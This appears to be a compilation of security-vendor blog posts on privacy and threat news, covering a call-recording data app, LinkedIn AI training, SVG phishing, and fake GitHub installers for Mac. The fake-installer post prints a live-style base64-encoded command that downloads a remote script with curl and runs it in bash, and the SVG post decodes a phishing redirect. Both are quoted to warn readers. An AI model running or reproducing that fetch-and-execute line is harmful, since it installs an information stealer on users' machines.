IT News

TechCrunch reports about a “bizarre app” inviting you to record and share your audio calls so that it can sell the data to AI companies. And if that’s not weird enough on its own, it’s ranking No. 2 in Apple’s US app store at the time of writing.

The name of the app is Neon Mobile and it promises to pay users hundreds or even thousands of dollars per year. Why would you do it? Its reasoning is the old “they already know everything about you anyway” adage and “you might as well get paid for it then.”

Neon will sell the data collected by the app to “AI companies for the purpose of developing, training, testing, and improving machine learning models, artificial intelligence tools and systems, and related technologies.”

The payment is $0.15 per minute if you’re the only Neon Mobile user in the conversation, and this doubles when the person on the other end uses the app as well. With a maximum payout of $30 per day and the understanding that the call has to be made through the app, you’ll have to be on the phone a lot to make thousands of dollars, but we can see why this might be an attractive offer to some people.

Some people are even already planning to do it as a second job. One commenter says:

“They just want the voice data. So if you and a friend agree to talk about pretend situations for an hour a day to make $900 a month that seems pretty easy. If both parties are doing it that comes out to $18 an hour which is pretty good.”

Neon Mobile promises that:

• It will never sell your personal data to any third party.
• It does not knowingly or intentionally collect personal data about children under 16.
• It will only record your side of the call unless it’s with another Neon user.

We have some doubts about how it will accomplish the one-sided recording technically, as well automatically filtering out names, numbers, and other personal details.

As always, there are some caveats. Looking at the Privacy Policy we noticed:

• Neon collects a lot of personal and technical data about you, like identifiers, contact details, usage data, payment information, event participation, account activity, testimonials, and other data from third-party sources.
• Any third-party integrations are your responsibility. These third-party integrations may ask for permissions to access your personal data, or send information to your Neon Account. It is the user’s responsibility to review any third-party integrations.
• Your personal data is shared with others. Neon regularly passes personal data to service providers and “trusted partners” for things like hosting, marketing, sales support, and analytics. combined marketing, support, and analytics.
• You have certain rights, but not absolute ones. You can request to access, delete, or correct the personal data Neon Mobile collects or maintains about you, but Neon may deny requests when the law allows.
• You need to watch out for opt-outs. If Neon wants to use your data in a new way, or if it plans to disclose it to another third party not already covered in the Privacy Policy, it will give you the choice to refuse this new use or disclosure. But this an “opt out” opportunity, so you will have to pay close attention to every change in the Terms of service and the Privacy Policy.
• The disclosure rights are quite broad. Neon reserves the right to disclose data to comply with legal obligations, protect rights and safety, investigate fraud, or respond to law enforcement requests, with broad latitude for “compelled disclosure”.

In other words, Neon gathers and combines a wide range of personal and usage data, shares it with partners and third parties, and reserves broad rights to repurpose or disclose it—leaving users to monitor policy changes and opt out if they don’t agree.

Given the breadth of the data collection and the numerous caveats (while framed as protections against abuse), I’d argue that Neon Mobile is paying a low price for users’ privacy.

It’s also worth noting that if you become disappointed with the app or its returns, it takes more than just deleting the app from your device .

“If you delete the Neon app (but do not close your Neon account), your calls can still be recorded when other Neon users who have the app call you. If you want to stop call recordings with other Neon users, close your account through your profile settings.”

I’d also advise anyone using the app to inform the person on the other end that the conversation will be recorded, since failing to do so may have legal implications.

We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

We’ve written in the past about cybercriminals using SVG files for phishing and for clickjack campaigns. We found a new, rather sophisticated example of an SVG involved in phishing.

For readers that missed the earlier posts, SVG files are not always simply image files. Because they are written in XML (eXtensible Markup Language), they can contain HTML and JavaScript code, which cybercriminals can exploit for malicious purposes.

Another advantage for phishers is that, on a Windows computer, SVG files get opened by Microsoft Edge, regardless of what your default browser is. Since most people prefer to use a different browser, such as Chrome, Edge can often be overlooked when it comes to adding protection like ad-blockers and web filters.

The malicious SVG we’ve found uses a rather unusual method to send targets to a phishing site.

Inside RECElPT.SVG we found a script containing a lot of food/recipe-related names (“menuIngredients”, “bakingRound”, “saladBowl”, etc.), which are all simply creative disguises for obfuscating the code’s malicious intentions.

This is the part of the code where the phishers hid a redirect:

Upon close inspection, the illusion of an edible recipe quickly disappears. 141 cups of eggs, anyone?

But picking the code apart, we noticed that the decoder works like this:

1. Search for data-ingredients=”…” in the given text.
2. Split the string inside the attribute by commas to get a list. E.g., 219cups_flour, 205tbsp_eggs,…
3. For each element, extract the leading numeric value (e.g., 219 from 219cups_flour).
4. Subtract 100 from this value.
5. If the result is an ASCII printable character (ranging from 32–126), then convert it to the character with that number.
6. Join all characters together to form the final decoded string.

Using this method we arrived at window.location.replace("https://outuer.devconptytld[.]com.au/");

window.location.replace is a JavaScript method that replaces the current resource with the one at the provided URL. In other words, it redirects the target to that location if they open the SVG file.

When redirected, the user will see this prompt, which is basically intended to hide the real location of the server behind Cloudflare services, but also provides some sense of legitimacy for the visitor.

It doesn’t matter what the user does here, they will get forwarded again with the code passing the e parameter (the target’s email address) on to the next destination.

But this is where our adventure ended. For us, the next site was an empty one.

We couldn’t determine what conditions had to be met to get to the next stage of the phishing expedition. But it is highly likely it will display a fake login form (almost certainly Microsoft 365- or Outlook-themed), to capture the target’s username and password.

Microsoft flagged a similar campaign which was clearly obfuscated with AI assistance and appeared even more legitimate at first glance.

Some remarks we want to share about this campaign:

• We found several versions of the SVG file dating back to August 26, 2025.
• The attacks are very targeted with the target’s email address embedded in the SVG file.
• The phishing domain could be a typosquat for the legitimate devconptyltd.com.au, so it could mean the targets were doing business with Devcon Pty Ltd who owns that domain. This is a tactic we often see in Business Email Compromise (BEC) attacks.
• We found several subdomains of devconptytld[.]com.au associated with this campaign. The domain’s TLS certificate dates back to August 24, 2025 and is valid for 3 months.

How to stay safe from SVG phishing attacks

SVG files are an uncommon attachment to receive, so it’s good to keep in mind that:

• They are not always “just” image files.
• Several phishing and malware campaigns use SVG files, so they deserve the same treatment as any other attachment: don’t open until the trusted sender confirms sending you one.
• Always check the address of a website asking for credentials. Or use a password manager, they will not auto-fill your details on a fake website.
• Use real-time anti-malware protection, preferably with a web protection component. Malwarebytes blocks the domains associated with this campaign.
• Use an email security solution that can detect and quarantine suspicious attachments.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

LinkedIn plans to share user data with Microsoft and its affiliates for AI training. Framed as “legitimate interest”, it won’t ask for your permission—instead you’ll have to opt out before the deadline.

Microsoft has made major investments in ChatGPT’s creator OpenAI, and as we know, the more data we feed a Large Language Model (LLM) the more useful answers the AI chatbot can provide. This explains why LinkedIn wants your data, but not how it went about it.

The use of personal data for AI improvements and product personalization always raises privacy concerns and we would expect a much lower participation rate if users had to sign up for it. The problem in this case is that you were already opted-in by default and your data will be used up to the point where you opt out.

To opt out, you should go to your LinkedIn privacy settings:

• Navigate to Settings & Privacy > Data privacy > Data for Generative AI Improvement.
  

• Toggle off Use my data for training content creation AI models.
  

• Optionally, file a Data Processing Objection request to formally object. To do this, access the Data Processing Objection Form, select Object to processing for training content-generating AI models, and send a request. Non-members can also file an objection if their personal data was shared on LinkedIn by a member.

You should also review and clean up older or sensitive posts, profiles, or resumes to reduce exposure. Again, opting out only stops future training on new data; it does not retract data already used.

The data LinkedIn might share is pretty extensive:

• Profile data, which includes your name, photo, current position, past work experience, education, location, skills, publications, patents, endorsements, and recommendations.
• Job-related data, such as resumes, responses to screening questions, and application details.
• The content you posted, such as posts, articles, poll responses, contributions, and comments.
• Feedback, including ratings and responses you provide.

Who is affected and how?

There are some contradicting statements going around about in which countries the new update to LinkedIn terms will apply. The official statement says members in the EU, EEA, Switzerland, Canada, and Hong Kong have until November 3, 2025, to opt out. (EEA is the EU plus Iceland, Liechtenstein, and Norway). Other sources say that UK users are affected as well. We’d advise anyone who has that setting and doesn’t want to participate to turn the “Use my data…” setting off.

Reportedly, a quarter of the over 1 billion LinkedIn users are in the US, so they can provide a lot of valuable data. In the terms update, users in the US are included in the part where it says:

“Starting November 3, 2025, we will share additional data about members in your region with our Affiliate Microsoft so that the Microsoft family of companies can show you more personalized and relevant ads. This data may include your LinkedIn profile data, feed activity data, and ad engagement data; it does not include any data that your settings you do not allow LinkedIn to use for ad purposes.”

You can review those settings and act as you prefer your data to be handled.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

A group of privacy commissioners in Canada have accused TikTok of scooping up information about hundreds of thousands of children who shouldn’t have been on the platform.

The Chinese social media giant is also accused of collecting data on Canadian users without properly explaining what it does with that information, the watchdogs added.

In a report issued last week, the Federal Privacy Commissioner, along with commissioners in British Columbia, Québec and Alberta, accused the service of failing to keep children under 13 off its platform. The service’s terms and conditions prohibit people under that age from using TikTok. From the report:

“The tools implemented by TikTok to keep children off its platform were largely ineffective. This was particularly true in respect of the majority of users who are ‘lurkers’ or ‘passive users’, who view videos on the platform without posting video or text content.”

Inadequate age gates and inappropriate data collection

TikTok relied on a voluntary age gate to keep very young users off the platform. That system simply trusts a person to correctly enter their birth date, the report found.

It used stronger protection to stop those under 18 from using its TikTok LIVE live-streaming function, in the form of facial analytics. However when it did use facial analysis, the company didn’t explain to users that it would use that information to determine their age and gender for ads and content recommendations, the privacy commissioners added.

TikTok collects significant data on its users, explained the report. This includes their demographics, interests, and location. A demonstration of its advertising portal even highlighted the possibility of targeting people with ads based on their transgender status. The report said:

“TikTok claimed that this was not supposed to be possible but was unable to explain how or why this option had been available.”

The company also failed to adequately explain to young users about how it would use their data. It used the same messaging that it gave to adults, said the privacy commissioners, who added that even that messaging was inadequate. The report added,

“The investigation uncovered that TikTok removes approximately 500,000 underage users from the platform each year. Where these children were engaging with the platform before being removed, TikTok was already collecting, inferring and using information about them to serve them targeted ads and recommend tailored content to them.”

What TikTok has agreed to do

TikTok has disagreed with the commissioners’ findings, but will nevertheless build three new age assurance systems into its service that will be better at keeping underage users off the platform. It will also make its privacy policy clearer about how it targets advertising and recommends content, and how it uses biometric data, and it will publish a plain-language policy for teens.

Finally it will put a ‘Privacy Settings Checkup’ system in place, making it easier for Canadians to review and set their privacy choices.

This isn’t the first time that Canada’s government has clashed with TikTok. It had already ordered TikTok Technology Canada to wind down operations last November based on concerns about the national security of its owner ByteDance operating on Canadian soil. This didn’t affect people’s ability to use the software in Canada, though. The move prompted TikTok to challenge the order in federal court.

South of the border, a group of investors including Oracle chair Larry Ellison, Dell Technologies chair Michael Dell, and Rupert and Lachlan Murdoch are negotiating the acquisition of TikTok’s US operation. A successful bid would see the US data stored in Oracle’s Cloud system.

We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

Police are using drones as flying automated license plate readers (ALPRs), according to a report by the Electronic Frontier Foundation (EFF).

And where there is a market, a provider will jump in. Or was it the other way around this time? Flock Safety, for example, recently told a group of potential law enforcement customers interested in Drone as First Responder (DFR) programs that its drone can be used as a flying license plate reader camera as well.

An ALPR system is an intelligent surveillance system that automatically identifies and documents license plates of vehicles by using optical character recognition. This is not necessary for the drones’ main task—it’s an extra feature.

We can definitely see the benefits of the DFR program, which tell police officers what to expect before they arrive at the scene. Increasing situational awareness by using drones makes it safer for both law enforcement officers and the public.

The problem is that drones equipped with ALPR technology can systematically record vehicle location and movement, indifferent to whether it’s in public or private spaces. Unlike fixed cameras, drones can reach places and angles otherwise inaccessible, so they can look in backyards, private driveways, and even through windows.

Depending on the local circumstances, police DFR programs involve a fleet of drones, which can range in number from a few to a few hundred. Low operational costs enable police and their drones to collect and store enormous amounts of data. These practices increase the risk of breaches or leaks. Agencies often keep ALPR and drone-captured data well beyond its useful period, store it on centralized or external servers, and regularly share it with other agencies or federal authorities, according to the EFF.

According to EFF’s Atlas of Surveillance there are approximately 1,500 police departments known to have a drone program. A recent Wired investigation raised concerns about one police department’s program, finding that roughly one in 10 drone flights lacked a stated purpose and for hundreds of deployment the reason was listed as “unknown.”

There is a thin line between unwarranted surveillance and accidental recordings. The EFF states:

“While some states do require a warrant to use a drone to violate the privacy of a person’s airspace, Alaska, California, Hawaii, and Vermont are currently the only states where courts have held that warrantless aerial surveillance violates residents’ constitutional protections against unreasonable search and seizure absent specific exceptions.”

Combined with Artificial Intelligence (AI)—and these are already operational—drones can become a force to be reckoned with. But we need to start thinking about regulations to limit the privacy implications, so we don’t end up in a surveillance-state society.

Flock has previously described its desire to connect ALPR scans to additional information on the person who owns the car, meaning that we don’t live far from a time when police may see your vehicle drive by and quickly learn that it’s your car and a host of other details about you.

We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Running a small business today can hardly be done from a single device, a single location, or a single network.

Staying cybersecure is quite the same.

To extend the security and privacy of small business owners, no matter where you are, Malwarebytes for Teams now includes personal VPN access, for no additional cost, for all registered devices. Whether you’re typing up a draft on your tablet at a café, answering urgent emails from your smartphone at the airport, or just protecting your browsing activity on your laptop, connecting to a personal VPN provides that extra comfort that what you’re doing online is your business and your business only.

With a personal VPN you can:

• Guard your online activity from prying eyes, whether on your laptop, smartphone, or tablet.
• Access information, content, and resources that are typically restricted by location.
• Maintain high speed connections for everything you do.

VPNs (Virtual Private Networks) have a bit of a dual reputation right now: They’re either IT tools that help multinational enterprises connect to corporate networks, or they’re covert programs that help paranoid privacy hawks slip by undetected online. The truth is that VPNs are for everyone, and that’s because what they offer is a benefit to all.

VPNs encrypt and protect your online traffic so that eavesdroppers can’t spy on your browsing behavior. This is useful both at public locations and in your office or home, because not all cyber snoops are hackers or criminals. In fact, some of the most active eavesdroppers are Internet Service Providers themselves, that sell consumer data for profit.

VPNs also provide a simple way to connect to an increasingly segmented internet. Despite the name, “the world wide web” can appear quite different when you travel to another country. The streaming platforms you enjoy at home can be blocked, their digital libraries can differ, and entirely benign resources can be gated behind separate laws. By connecting to any variety of servers through a VPN, you can access the internet you know and rely on, no matter your physical location.

It’s important to remember, however, that a VPN is just one part of a larger cybersecurity strategy. You still need to protect your small business’s devices from malware infections, rogue viruses, shady websites, and online scams.

For those threats, Malwarebytes for Teams also keeps you safe, especially when you’re mobile.  

Malwarebytes Browser Guard is a free browser add-on that stops invasive ad trackers and flags dangerous websites connected to cybercriminal networks that are cleverly disguised to steal your information or infect your device. And for every other type of concerning message, email, link, or QR code, Malwarebytes Scam Guard for iOS and Android provides 24/7, AI-powered evaluations on who to trust, where to click, and what to ignore.

As every small business is unique, every security plan must adapt. Malwarebytes for Teams is proud to offer the security and privacy options that keep a modern mobile business safe online from hackers, scammers, and digital snoops.

Fake versions of legitimate software are currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.

Unfortunately, Malwarebytes for Mac is one of them.

Impersonating brands is sadly commonplace, as scammers take advantage of established brand names to target their victims. So this is nothing new, but we always want to warn you about it when we see it happening.

In this case, the cybercriminals’ goal is to distribute information stealers. They figured out a while ago that the easiest way to infect Macs is to get users to install the malware themselves, and the Atomic Stealer (aka AMOS) is the go-to information stealer for Macs.

The LastPass Threat Intelligence team has posted information about the campaign, which follows a similar pattern for all the impersonated software. Sometimes, the starting point is a sponsored Google ad (did we mention we don’t like them? Oh yes, we did!) that points to GitHub instead of the official page of the developer.

But in other, less obvious cases, you may see search results like these:

These only came up at the top of the search results when I explicitly searched for “Malwarebytes Github MacOS”, but the cybercriminals are known to have used Search Engine Optimization (SEO) techniques to get their listings higher in the search results.

The idea is to get the aspiring user to click on the “GET MALWAREBYTES” button on the dedicated GitHub page.

If someone does click that button, they will end up on a download page with instructions on how to install the fake product, which is actually an information stealer.

The terminal installation instructions for Malwarebytes for Mac pointed to a recently registered domain, but thankfully our Browser Guard blocked it anyway.

Here’s a technical breakdown of the instructions provided to the visitor:

• /bin/bash -c "<something>" runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.
• The part in quotes uses $( ... ). Everything inside this gets executed first; its output becomes part of the outer command.
• $(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d) echo ... | base64 -d decodes the long string.
• curl -fsSL is a command to download data from the web. The options mean:
  • -f: Fail silently for HTTP errors.-s: Silent mode (no progress bar).-S: Show errors if -s is used.
  • -L: Follow redirects.

So, putting all this together:

The inner command turns into: curl -fsSL https://gosreestr[.]com/hun/install.sh

The outer command becomes: /bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"

So, the complete command tells the system to download a script directly from an external server and immediately execute it using Bash.

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.

The files to download have already been taken down, but users that recognize this chain of infection are under advice to thoroughly check their machines for an infection.

Impersonated software besides Malwarebytes and LastPass included:

• 1Password
• ActiveCampaign
• After Effects
• Audacity
• Auphonic
• Basecamp
• BetterSnapTool
• Biteable
• Bitpanda
• Bitsgap
• Blog2Social
• Blue Wallet
• Bonkbot
• Carbon Copy Cloner
• Charles Schwab
• Citibank
• CMC Markets
• Confluence
• Coolors
• DaVinci Resolve
• DefiLlama
• Desktop Clockology
• Desygner
• Docker
• Dropbox
• E-TRADE
• EigenLayer
• Fidelity
• Fliki
• Freqtrade Bot
• Freshworks
• Gemini
• GMGN AI
• Gunbot
• Hemingway Editor
• HeyGen
• Hootsuite
• HTX
• Hypertracker
• IRS
• KeyBank
• Lightstream
• Loopback
• Maestro Bot
• Melon
• Metatrader 5
• Metricool
• Mixpanel
• Mp3tag
• Mural
• NFT Creator
• NotchNook
• Notion
• Obsidian
• Onlypult
• Pendle Finance
• Pepperstone
• Pipedrive
• Plus500
• Privnote
• ProWritingAid
• Publer
• Raycast
• Reaper
• RecurPost
• Renderforest
• Rippling
• Riverside.fm
• Robinhood
• Rug AI
• Sage Intacct
• Salesloft
• SentinelOne
• Shippo
• Shopify
• SocialPilot
• Soundtrap
• StreamYard
• SurferSEO
• Thunderbird
• TweetDeck
• Uphold
• Veeva CRM
• Viraltag
• VSCO
• Vyond
• Webull
• Xai Games
• XSplit
• Zealy
• Zencastr
• Zenefits
• Zotero

But it’s highly likely that there will be more, so don’t see this as an exhaustive list.

How to stay safe

Both ThreatDown and Malwarebytes for Mac detect and block this Atomic Stealer variant and many others, but it’s better to not download it at all. There are a few golden guidelines on how to stay safe:

• Never run copy-pasted commands from random pages or forums even if they are on seemingly legitimate GitHub pages, and especially don’t use any that involve curl … | bash or similar combos.
• Always download software from the official developer pages. If they do not host it themselves, verify the download links with them.
• Avoid sponsored search results. At best they cost the company you looked for money and at worst you fall prey to imposters.
• Use real-time anti-malware protection, preferably one that includes a web protection component.

If you have scanned your Mac and found the information stealer:

• Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
• If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
• After reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.
• Change all the passwords that were stored on the affected system and enable multi-factor authentication for your important accounts.
• If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team are happy to assist you if you have any concerns.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

This week on the Lock and Code podcast

There’s more about you online than you know.

The company Acxiom, for example, has probably determined whether you’re a heavy drinker, or if you’re overweight, or if you smoke (or all three). The same company has also probably estimated—to the exact dollar—the amount you spend every year on dining out, donating to charities, and traveling domestically. Another company Experian, has probably made a series of decisions about whether you are “Likely,” “Unlikely,” “Highly Likely,” etc., to shop at a mattress store, visit a theme park, or frequent the gym.

This isn’t the data most people think about when considering their online privacy. Yes, names, addresses, phone numbers, and age are all important and potentially sensitive, and yes, there’s a universe of social media posts, photos, videos, and comments that are likely at the harvesting whim of major platforms to collect, package, and sell access to for targeted advertising.

But so much of the data that you leave behind online has nothing to do with what you willingly write, post, share, or say. Instead, it is data that is collected from online and offline interactions, like the items you add in a webpage’s shopping cart, the articles you read, the searches you make, and the objects you buy at a physical store.

Importantly, it is also data that is very hard to get rid of.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Peter Dolanjski, director of product at DuckDuckGo, about why the internet is so hungry for your data, how parents can help protect the privacy of their children, and whether it is pointless to try to “disappear” online.

“It’s not futile…  Taking steps now, despite the fact that you already have information out there, will help you into the future.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.

A security flaw in the American Archive of Public Broadcasting (AAPB) website allowed unauthorized access to protected and private media, according to BleepingComputer.

The American Archive of Public Broadcasting (AAPB) is a collaborative initiative between the Library of Congress and WGBH Educational Foundation, aimed at digitally preserving historically significant public radio and television programs from the past seven decades.

The archives encompass a wide array of materials: news and public affairs programs, local history productions, educational content, science, music, art, literature, environmental programming, and raw interviews from landmark documentaries. The digitized content contains millions of items, including unique, sometimes sensitive material documenting pivotal events, regional culture, and documentary evidence of America’s civil and artistic history.

Access without proper controls could facilitate copyright violations or the misuse of material critical for scholarship, public education, and future generations. And that’s what the discovered vulnerability provided.

Not only did this vulnerability go unnoticed for years, the researcher who discovered the hole found that active exploitation started as early as at least 2021, even after a previous report by the same researcher to AAPB. But when BleepingComputer reached out, AAPB managed to implement a fix within 48 hours. And the researcher was able to confirm it worked.

AAPB’s Communications Manager, Emily Balk told BleepingComputer:

“We’re committed to protecting and preserving the archival material in the AAPB and have strengthened security for the archive.”

On Discord the exploit method began circulating halfway through 2024, but even before that exploit, a simple script allowed users to request media files by ID and bypass AAPB’s access controls. This method worked even if the requested media files fell into protected or private categories. As long as the request had a valid media ID, it was possible to download the content.

Apparently there are data-hoarder communities that do not care about copyright, which abused and shared the method for many years. The main impact was the unauthorized access and sharing of archival media, some of which was not intended for public release. This is an institutional and copyright issue.

However, users should:

• Avoid sharing or downloading protected or leaked content, as you could be in a legal gray area.
• Be wary of unofficial sources circulating rare or unpublished public broadcasting material.
• Anticipate there might be phishing emails coming based on this breach. As with other news events, phishers will use them as clickbait.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Been scammed? Hoping to report it to the FBI? Definitely do so, but be careful. Spoofed versions of the FBI’s Internet Crime Complaint Center (IC3) website are now circulating online, and they lead straight back to the scammers.

The FBI issued an advisory last week, warning that cybercriminals are setting up fake versions of their site to tempt people into entering their personal information:

“Members of the public could unknowingly visit spoofed websites while attempting to find FBI IC3’s website to submit an IC3 report.”

Criminals spoof legitimate sites like the IC3 portal using techniques including ‘typosquatting’. They’ll create web domains that look like the target, but have subtle differences in the URL. They’ll often misspell or add characters to a domain name, which can deceive users attempting to report cybercrime incidents.

The IC3 is the primary hub for cybercrime reporting in the US, and its services are now in high demand. According to the 2024 IC3 Crime Report, victims filed 859,532 complaints with it last year, totalling $16.6 billion in losses (up a third from 2023).

Criminals recognize that victims seeking help are often vulnerable to secondary attacks. After all, they already got caught out once, and are likely already at an emotional disadvantage. So they often succeed in attracting those victims to fake portals like these, with a view to scamming them again. A distracted or distraught victim can often hand over their sensitive data for a second time, including names, addresses, phone numbers, email addresses, and banking information.

This threat follows a disturbing pattern of law enforcement impersonation lately. In April this year, the FBI reported that criminals were targeting victims via social media, emails, and phone calls. In some cases, scammers would use fake social media accounts to approach members of fraud victim groups, convincing them that their funds had been recovered.

Attackers often impersonate law enforcement directly. In March, the FBI Philadelphia Field Office reported that scammers were routinely spoofing authentic law enforcement and government agency phone numbers to extort money from victims. A 2023 NPR investigation revealed how criminals leverage caller ID spoofing and voice cloning technology to impersonate real US Marshals.

As far back as 2022, the FBI reported that people were impersonating its officials. In one particularly nasty scenario, people were being duped by romance scammers, and when they became wise to the trick and cut communications, the organization behind the scam would contact them pretending to be a government official asking for help to catch romance scammers. Or they would tell the victim that they need to clear their name, which has been linked to a crime.

If you do fall victim to this kind of fraud, it’s far from certain that you’ll get your money back. The IC3’s 2024 report documents the Recovery Asset Team’s efforts to combat fraud through the Financial Fraud Kill Chain, which achieved a 66% success rate freezing cash from fraudulent transactions. According to that report, the average victim to online crime lost almost $20,000.

How to protect yourself

The main thing to remember is that IC3 employees will never contact you directly via phone, email, or social media, and will never request payment for fund recovery. If someone recommends that you visit a site for fund recovery, take that recommendation with several swimming pools-worth of salt.

If you suspect you’ve already been scammed, then quick reporting is key. Stop talking to the scammers immediately and get in touch with the IC3 now. Do that by typing the www.ic3.gov web address directly into your browser rather than relying on someone else’s link or a search result.

All online crime is nasty, but this portal scam is particularly horrid, because it often targets people who have already been hit once. As always, check in with your less-tech-savvy friends and relatives to ensure they haven’t fallen victim to something like this, especially if they’re older. One infuriating stat from the IC3 report is that the older the victim, the greater the loss.

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!